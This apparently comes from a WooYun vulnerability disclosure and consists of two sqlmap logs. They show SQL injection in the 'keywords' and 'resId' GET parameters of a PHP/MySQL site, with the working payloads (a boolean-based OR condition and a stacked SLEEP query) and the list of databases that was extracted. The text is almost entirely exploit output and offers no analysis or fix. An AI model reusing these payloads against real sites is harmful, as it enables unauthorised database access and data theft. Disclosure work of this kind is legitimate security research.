WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keywords
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: a=init&c=help_search&catid=29&keywords=-8431' OR (2227=2227)#&m=content&siteid=1
---
[13:58:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
[14:08:36] [INFO] fetching database names
[14:08:36] [INFO] fetching number of databases
available databases [3]:                                                        [*] information_schema 
[*] portal 
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: resId
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: r=studio/resources/info&resId='; SELECT SLEEP(5)-- &sid=175
---
[13:58:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.11
[13:58:36] [INFO] fetching database names
[13:58:36] [INFO] fetching number of databases
available databases [3]:                                                       
[*] information_schema 
[*] portal 
[*] test